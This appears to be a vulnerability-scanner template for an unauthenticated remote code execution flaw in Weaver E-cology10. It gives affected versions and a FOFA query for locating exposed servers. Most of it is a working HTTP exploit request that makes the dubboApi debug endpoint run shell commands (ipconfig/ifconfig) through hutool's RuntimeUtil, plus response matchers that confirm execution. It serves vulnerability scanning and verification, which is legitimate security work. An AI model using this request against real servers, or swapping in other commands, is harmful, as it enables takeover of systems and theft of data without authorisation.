## id: VEID-2026-11101
## name: 泛微E-cology10 存在远程代码执行漏洞
## author: hack007x
## severity: critical
## tags: veid,rce,veid2026
## description:泛微e-cology10存在远程代码执行漏洞QVD-2026-14149，攻击者无需认证即可通过特定接口在目标服务器执行任意代码，完全控制服务器并导致敏感数据泄露。
## affects: E-cology10.0 && 安全补丁版本 < v20260312
## fofa-query: icon_hash="-1619753057"
## verification: true


#$ payload = [["ipconfig"]] | [["ifconfig"]]
POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/json

{{payload}}


#@ stop_scan: true
#@ condition: and
#@ matcher: header["Content-Type"] contains "json" 
#@ matcher: body matches /inet addr:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ || (body contains "Windows IP" && body contains "子网掩码")
#@ matcher: status_code == 200




# @VEIL-STAMP: fc0e7ada8bb5a8cf038ecf8940df894100f4e73610ceffbfef7e325b654a7c14
